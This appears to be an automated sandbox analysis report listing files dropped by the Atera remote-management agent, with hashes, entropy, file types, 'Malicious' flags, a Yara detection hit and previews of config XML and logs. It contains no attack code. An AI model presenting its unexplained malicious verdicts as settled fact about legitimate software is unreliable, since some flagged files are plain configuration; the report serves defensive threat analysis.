                                                                                                                                                                                                                                        Entropy (8bit):7.999644881255343
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:24576:peRqTiLR3omp/AAzr5nxL2CP+sZ4tgMfQo:p8nLR4WYA72CPPoKo
                                                                                                                                                                                                                                        MD5:9B1F97A41BFB95F148868B49460D9D04
                                                                                                                                                                                                                                        SHA1:768031D5E877E347A249DFDEAB7C725DF941324B
                                                                                                                                                                                                                                        SHA-256:09491858D849212847E4718D6CC8F2B1BC3CAA671CEB165CF522290B960262E4
                                                                                                                                                                                                                                        SHA-512:9C8929A78CB459F519ACE48DB494D710EFD588A19A7DBEA84F46D02563CC9615DB8AA78A020F08ECA6FA2B99473D15C8192A513B4DF8073AEF595040D8962AE4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-.....;9rX.9..........9...AgentPackageInternalPoller/AgentPackageInternalPoller.exe....0Z.......U........ee..Th8.............t.v.g....g......M.........c..K.`|.'1.W.g.;.W+.e.....D.."|...]-:.To.:.`B(.E{.T.?..z...&.....g.....1.,km8.....Y......WZm;..!.....k.....iA...~.zK..EW'.....p.A....Q6.~S......A.......6....h=C3N0y.$i....M...N....C......I.....UCp.p....x..WQ!.p..>.'N%.2Z.l.R8./...%Ew..T..yy.....q...U.nqH......".......n.6M..P.:t...t1..r...!9Z.N.X.s8.3.9V.a...m8....LpWS..O.8..R6..O.l....e|(..F...Og.h.0..,..Z.H....Rl..L.N.9.\...."4..%..A.<."..Iy...:..GBw_1......3.y.p...a...*...l..._.FI.Z.....+.L.....]Y.K|RM.Pf..in.........93+2.QMH.t......<...3.. ....2..!....t..)).I\.qw1.'..J...J3".K'rt.h.f+.I.7...q.MK......V.._!Q.].w..au.[.brv.T&..Lfm./..J.$.m...... t.u..uQ...L...\...M.Ihp.rG.J..C".....d.....;z..d....L.p.r.c7....q[2.e.........!(....Ld.....M..9...M....>EN&dY.]....>QUJ..N.+d.cr..].D.o.........?o.~@....@..D[...5.C.eP.a.....;..:.._v.....R
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):219696
                                                                                                                                                                                                                                        Entropy (8bit):5.943430076853408
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:It3Mf3ZwYUPEpbPwygJQetg0+BpU3I0toxhGf:2MfJPpjYN8hI
                                                                                                                                                                                                                                        MD5:01807774F043028EC29982A62FA75941
                                                                                                                                                                                                                                        SHA1:AFC25CF6A7A90F908C0A77F2519744F75B3140D4
                                                                                                                                                                                                                                        SHA-256:9D4727352BF6D1CCA9CBA16953EBD1BE360B9DF570FD7BA022172780179C251E
                                                                                                                                                                                                                                        SHA-512:33BD2B21DB275DC8411DA6A1C78EFFA6F43B34AFD2F57959E2931AA966EDEA46C78D7B11729955879889CBE8B81A8E3FB9D3F7E4988E3B7F309CBD1037E0DC02
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):541
                                                                                                                                                                                                                                        Entropy (8bit):5.097123194334321
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdGp2VvOF9LNFF7ap+5v5OXrRf/2//FicYo4xT:JdsIOvPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                        MD5:D0EFB0A6D260DBE5D8C91D94B77D7ACD
                                                                                                                                                                                                                                        SHA1:E33A8C642D2A4B3AF77E0C79671EAB5200A45613
                                                                                                                                                                                                                                        SHA-256:7D38534766A52326A04972A47CACA9C05E95169725D59AB4A995F8A498678102
                                                                                                                                                                                                                                        SHA-512:A3F1CFF570201B8944780CF475B58969332C6AF9BEA0A6231E59443B05FC96DF06A005FF05F78954DBE2FEC42DA207F6D26025AA558D0A30A36F0DF23A44A35C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhXWp:WBc
                                                                                                                                                                                                                                        MD5:DFDD2EB77BBB74518BAD98519A857D41
                                                                                                                                                                                                                                        SHA1:5F4F91D73EA620CDF0E5AC458E80B71412B1BB9F
                                                                                                                                                                                                                                        SHA-256:7655078305CC5B4F62569EF9868E1B04FCC491D33FDAD1F8E4610C038BCBAC8D
                                                                                                                                                                                                                                        SHA-512:481CDA97C03294EBAB036F99727828983C8D0E4C137AF05FDEA7FD296D11378904BACCE2D58D44F932A0BF7F2A30A9B44F4CBC05E253F132B1EF641F648C8DF0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=23.8
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):52272
                                                                                                                                                                                                                                        Entropy (8bit):6.300719339270839
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:5i8fXCGsSVh/2ixXxKFArYCJdshn9xvlOaEpYinAMxCuMr:5FaM2gS1y2F9Ob7HxCr
                                                                                                                                                                                                                                        MD5:9467F653980C1C37E4C64811BA27C976
                                                                                                                                                                                                                                        SHA1:68130FABBB50EAF5CFE2C355BA13B303DD373FB6
                                                                                                                                                                                                                                        SHA-256:821847799A2B7B3A6EC20BA61388AC87707D9C6865BD904A44DE5B033BD2EF29
                                                                                                                                                                                                                                        SHA-512:E72B7802256053589D889B2B7E74A2B53F328289A12CC0D4930D66410D00585C67B2C434512473CD2E74C8F2CB7685C2C34FCFC3DBA4A52399532CEB04153597
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):96816
                                                                                                                                                                                                                                        Entropy (8bit):6.1801131806578455
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:hJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvC7Hxwx:hQUm2H5KTfOLgxFJjE50vksVUfPvCI
                                                                                                                                                                                                                                        MD5:F1B2303DD7E152BA70F3537EDB2E9638
                                                                                                                                                                                                                                        SHA1:7E359D4B9011449DABB7F8236F14851A346B5028
                                                                                                                                                                                                                                        SHA-256:8EE8B304339B6F87E79B117F605375AFFFCBABA290A1B41BB6B3C1A40E46767C
                                                                                                                                                                                                                                        SHA-512:A4DD48F1AFF528DADF9974ADA1740CE785823FB584F55191D008158FCFB11F9ADAD8EFF992B8FF761058706C1717E28FBC9C337CF39D4EE4FFAA529501CB3188
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):19
                                                                                                                                                                                                                                        Entropy (8bit):2.755057619938308
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:YzT1Q:M1Q
                                                                                                                                                                                                                                        MD5:C30F6D82CD2BF2850CC267E349F09EFA
                                                                                                                                                                                                                                        SHA1:8F687530F4F15987251968B4375DFB9582166AFA
                                                                                                                                                                                                                                        SHA-256:CF3E34E9198A8E2A08CCF678D69E1ACDCD8D822B056A7D87AD3F8661A55D246B
                                                                                                                                                                                                                                        SHA-512:99BF3AA409771CB61C973FCAC8B4D9C212D4B852E2F23E248B1FDB698347EFA5ADC651DA24F14A55C627A8B1015F5EA0650EFAE2A59D94C8782F3BAB2739C664
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:02/10/2024 11:20:32
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):499760
                                                                                                                                                                                                                                        Entropy (8bit):6.056862695710082
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:HXv781Hpx+GfCdLr/jd9yyeEAHweiPofdyz7qd352SW8CdykAfqO:/76BfC5avfdyvc2SN
                                                                                                                                                                                                                                        MD5:3CE7E73DB6F575A0D382DDAA8E1A3C10
                                                                                                                                                                                                                                        SHA1:031C13652C540CA7F798D141D7C3333FB1C71618
                                                                                                                                                                                                                                        SHA-256:692185C37DB7505250E58CC55D6707FCB099315A7FF319A9CC92FD99C5F0EEA7
                                                                                                                                                                                                                                        SHA-512:5270E772613864BD223F31F89CFA500E56E7863967C58C503F92E193AF8C8CAF934B7755868EC21585A38E8D6D186A2DC5528A805A62A0BFA56B59E6506BFF81
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960733432365752
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:bBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUk:bBjk38WuBcAbwoA/BkjSHXP36RMGt
                                                                                                                                                                                                                                        MD5:2A9525F27730CBF9E7145AADE4CDA830
                                                                                                                                                                                                                                        SHA1:A6A99E02599656DE1C7F51B02C84BBA8AAE0346D
                                                                                                                                                                                                                                        SHA-256:29D0073080509DB7F3F20C47980A1347CC4139C5F2E26C9C160AE67CE5EECB6E
                                                                                                                                                                                                                                        SHA-512:DDDEEC7AA9D3F9E6187718564AE1A447FCAB12EC2DCBD26EDD87217B4815C274A6BAF90A027766FCC94815C762ED9BFA8D0DEF6C1B2F84279DED9C66852D381E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):277040
                                                                                                                                                                                                                                        Entropy (8bit):6.190626027944278
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:rSOIleacQlBh2YQMoIBhpq01TLvlj9b6gRZNsRYA:suQlBAMW0BvltxZ6B
                                                                                                                                                                                                                                        MD5:4ECF017FD71CC84A4CBAB7507B8634BE
                                                                                                                                                                                                                                        SHA1:2343F37490F9A11F5F0878A1553F0FAF504FE062
                                                                                                                                                                                                                                        SHA-256:871D9403D045F94FC433907E49B68894764FCAF81E12FBDE2AC7A08642DDA32C
                                                                                                                                                                                                                                        SHA-512:5FCB9BDA9C857BA1AD2EC0B19AD109AC54BAC91B8F8F00968560623C8AFD01FAEE1078F7C76010C7526A37C46EE0DB74A0E0DB151186F8FB220105F7091FA69B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):149552
                                                                                                                                                                                                                                        Entropy (8bit):6.059724018456156
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:o/S+nps5/3oat9QrwQmUgs0giOBDQntBBGBBKBUkBBXBBgBBFBUABU1BB0BBBBgB:o/S+nps5/3f9Qrdd5EtBBGBBKBUkBBXh
                                                                                                                                                                                                                                        MD5:2FF31980FD256EF1B1E143D4699BB727
                                                                                                                                                                                                                                        SHA1:608A21DA2B243E63DAD9E36EE84BC38C921F8E77
                                                                                                                                                                                                                                        SHA-256:F34AD6FB7847A85ADBE1492C783233A8A32BB5E96972FA3738538CE20513F682
                                                                                                                                                                                                                                        SHA-512:2FEF83A7668D190297863592FBBC8E766042067138C3A163771CDCF1FB284BC8162EA6B7B958CB076B6AB654216B855324AE292F78931C47EDC33B52376943AD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27184
                                                                                                                                                                                                                                        Entropy (8bit):6.334370226233819
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Bn1VM0JrpNWDcIh6leOiDFIFBYp1+/EpYinAMxCw:BnvXYcIh6yFIFBYpc47Hxn
                                                                                                                                                                                                                                        MD5:A964D6B5F323E343E884A1E4EBBA21A3
                                                                                                                                                                                                                                        SHA1:41FEA32C2FCC56070CF904AB441019F963C83ED5
                                                                                                                                                                                                                                        SHA-256:0214D2C78CC1DBE92853305FA12119BBE09EA06B5EB9C4B4E7AD76B6FAF232ED
                                                                                                                                                                                                                                        SHA-512:3E93C094D3B9D77BAE9C1725B452743FDFA0A20EB07FFC50EA861C501821710A2C29197CF43DCEC1BF089A5BC9B8F2BF57F9FD0EC8D9805D00E32538D03CD46C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.955083228632948
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:R784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRX:R7N1r9KGI04CCARLX
                                                                                                                                                                                                                                        MD5:FA432B69828C0F175E44B367AF91ED2D
                                                                                                                                                                                                                                        SHA1:C0E72D5C64E9B560311EBD1EC3A35CED46386C78
                                                                                                                                                                                                                                        SHA-256:6718AFA55EF89805B69360C9E88347A39CC302AB3C16590E78136C20DB025613
                                                                                                                                                                                                                                        SHA-512:E0C54D9126C557C24013486A31D5477EFF2B800ADAE472C3103EE1F1CD527546E6DCEFB19D5DCE602AEE6DA7A0290F413CE2C6C09DF28D4333C4E62510FE2064
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):639
                                                                                                                                                                                                                                        Entropy (8bit):4.7319244448977775
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:M17IytXEO17Iy6XEOMrDT1m4ECuZDQ14Qgl1F10r6l1671Dr6l1671n4gl1Q:GttXXtWqm4E84QCH0E65DE654CQ
                                                                                                                                                                                                                                        MD5:9A64C59AB0C91FA9CF86FDB6B80443C6
                                                                                                                                                                                                                                        SHA1:23B69CFEAA5B651780718D61D7FD0D7624D5E0A9
                                                                                                                                                                                                                                        SHA-256:4812DF8DED980A451318C07C4811F7FA1D1D6956DFC766F25A55CBA28A5B24E3
                                                                                                                                                                                                                                        SHA-512:76247AAC0348F08A7E22DFE21AE45A8A8F9056677B1F98A36BE3A464B92FEB2C8B470CB028622E1A2CB4B59E44D5B4049D23A8C5671618B82DC8B58616E160D8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:02/10/2024 11:20:27 In Program static constructor, before instantiating _logger02/10/2024 11:20:27 In Program static constructor, after instantiating _logger without using _logger02/10/2024 11:20:28 Starting Main(), logging without using _logger..02/10/2024 11:20:28.277 am: Info: Before PollAll() call written at: 02/10/2024 11:20:28..02/10/2024 11:20:32.636 am: Info: In PollAll() before Poller.PollAll(false) written at: 02/10/2024 11:20:32..02/10/2024 11:20:32.652 am: Info: In PollAll() after Poller.PollAll(false) written at: 02/10/2024 11:20:32..02/10/2024 11:20:32.667 am: Info: After PollAll() call written at: 02/10/2024 11:20:32
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1246506
                                                                                                                                                                                                                                        Entropy (8bit):7.999702247108497
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:24576:Ony3ipTOpSfZauTZ0OH58yGrxiVj3WqHvYfUmanGGJFE:OnaSOpGoud0OHGliZWqH3bn/E
                                                                                                                                                                                                                                        MD5:E74D2A16DA1DDB7F9C54F72B8A25897C
                                                                                                                                                                                                                                        SHA1:32379AF2DC1C1CB998DC81270B7D6BE054F7C1A0
                                                                                                                                                                                                                                        SHA-256:A0C2F9479B5E3DA9D7A213EBC59F1DD983881F4FC47A646FFC0A191E07966F46
                                                                                                                                                                                                                                        SHA-512:52B8DE90DC9CA41388EDC9AE637D5B4CE5C872538C87CC3E7D45EDCF8EFF78B0F5743AB4927490ABDA1CFF38F2A19983B7CCC0FE3F854B0EACCA9C9CE28EDA75
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):37936
                                                                                                                                                                                                                                        Entropy (8bit):6.42035670242574
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:GlK72yzFcoUzzxYeHTxwx6/ufD/EpYinAMxCoG:3e9YeHVwYe47Hx6
                                                                                                                                                                                                                                        MD5:EFB4712C8713CB05EB7FE7D87A83A55A
                                                                                                                                                                                                                                        SHA1:C94D106BBA77AECF88540807DA89349B50EA5AE7
                                                                                                                                                                                                                                        SHA-256:30271D8A49C2547AB63A80BC170F42E9F240CF359A844B10BC91340444678E75
                                                                                                                                                                                                                                        SHA-512:3594955AD79A07F75C697229B0DE30C60C2C7372B5A94186A705159A25D2E233E398B9E2DC846B8B47E295DCDDD1765A8287B13456C0A3B3C4E296409A428EF8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1295
                                                                                                                                                                                                                                        Entropy (8bit):5.018953579697613
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdArdEtPF7NhOXrRH2/BLVv+13vH2/nVQ7uH2/FV0PH2/+w39y:3Ar+z7O7Rgdp+1/gnSagFsg+w3w
                                                                                                                                                                                                                                        MD5:843D2196B96E53ABCAE6F4C243D1A7A6
                                                                                                                                                                                                                                        SHA1:EB28441616660FD53653999595A3309961AA9A54
                                                                                                                                                                                                                                        SHA-256:175C1EBF4B5C56563944E65C9E8AE4595730155D69854499DB638E82E16DF056
                                                                                                                                                                                                                                        SHA-512:2C24DA122963E1BF533FD8A5C841C9BCD86442E0E49D3BE379FBB21AA607FDC6C7D30BA5573615416D55538429652BF1108D88EC8267FDC5D8C8F9ECAF11D0A1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-12.0.0.0" newVersion="12.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.9.1.0" newVersion="2.9.1.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):11
                                                                                                                                                                                                                                        Entropy (8bit):3.459431618637298
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhUnn:Wu
                                                                                                                                                                                                                                        MD5:5EDA46A55C61B07029E7202F8CF1781C
                                                                                                                                                                                                                                        SHA1:862EE76FC1E20A9CC7BC1920309AA67DE42F22D0
                                                                                                                                                                                                                                        SHA-256:12BF7EB46CB4CB90FAE054C798B8FD527F42A5EFC8D7833BB4F68414E2383442
                                                                                                                                                                                                                                        SHA-512:4CF17D20064BE9475E45D5F46B4A3400CDB8180E5E375ECAC8145D18B34C8FCA24432A06AEEC937F5BEDC7C176F4EE29F4978530BE20EDBD7FED38966FE989D6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=1.6
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):102448
                                                                                                                                                                                                                                        Entropy (8bit):6.190700491174632
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:hPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OL87HxBg:h2bYbYSWd85I5sSakFQhHL8/g
                                                                                                                                                                                                                                        MD5:266A4736FE6DFEADBC40C66AF39D3871
                                                                                                                                                                                                                                        SHA1:D090E63810691F78F760E55640B81958BC715183
                                                                                                                                                                                                                                        SHA-256:4D6091013BF285AF05D901BA130E86D8CEFDB4E387540C3814929C1277C2DDF8
                                                                                                                                                                                                                                        SHA-512:AB43966CEFC08A8FE9B7A1787948F55A73B243CA6DE7259FD42E5BD4ABAE61D562C9642770708BA38AB6118D3755741529ED51E7DB2A8A811BE8B876F2922A8B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95280
                                                                                                                                                                                                                                        Entropy (8bit):5.998846079851237
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:GiLY8I1pq2jBTn9kbf0KNGVIYMcoS1JkEX5g7Hxlv:LZ0PMcjrgv
                                                                                                                                                                                                                                        MD5:C6339BD38794C9EB831004955DE64D16
                                                                                                                                                                                                                                        SHA1:EAE04876F94347538735F853B7F14778CB75180F
                                                                                                                                                                                                                                        SHA-256:855D0323807390D8F499355D0030685FBD6DC6939218A15059CB3E9C744AB1A4
                                                                                                                                                                                                                                        SHA-512:F62F76F305285F1C206AEFB8418E48BD2074DEC768C16986353305F34D17524E9A9AEA29AAE11B0D927247161F21039933B3EA68F2BC7F40623B471E123B33F7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51760
                                                                                                                                                                                                                                        Entropy (8bit):6.408406581403349
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:hQMnMYnUFMSptE7C+t2RO3neZN8752vwzE8Kku6ZFMLcyMmEpYinAMxCl5E:h9MYn1seLE8JFMLcyMH7Hx+E
                                                                                                                                                                                                                                        MD5:7F8418A330DA75F653CC1A50F0B91175
                                                                                                                                                                                                                                        SHA1:7448DCCCDB8FBB1CC827FFE4861C7BD529EE85F5
                                                                                                                                                                                                                                        SHA-256:BF780EB84424039CAB84C818D21A402369EC1BDC9136E1CDBB60486343A07723
                                                                                                                                                                                                                                        SHA-512:3CAC7066B3F210D826383CA000CDC581C0CA193800C97F2F34C6139BB4880A12A485604344EF22BADFD4609F2A0E7645E81DECFA8C5BF8C6DF4406BFEE6DBFDA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):354352
                                                                                                                                                                                                                                        Entropy (8bit):6.1536791121281995
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:4r/iEF3zTxesPlx5zIAUH+2n8G4smIkuxhnCq7a/ZmvYyD:4hpp9xxIBeXGfvYyD
                                                                                                                                                                                                                                        MD5:697D8BC281B58B1FCEEC721B9BC01059
                                                                                                                                                                                                                                        SHA1:DA468B41FDADE096896B6835645DEFF110F438F5
                                                                                                                                                                                                                                        SHA-256:82C4EFE948B812C844DE4950130C292CDC49EDA42F447E17DE6CC451A1F5135E
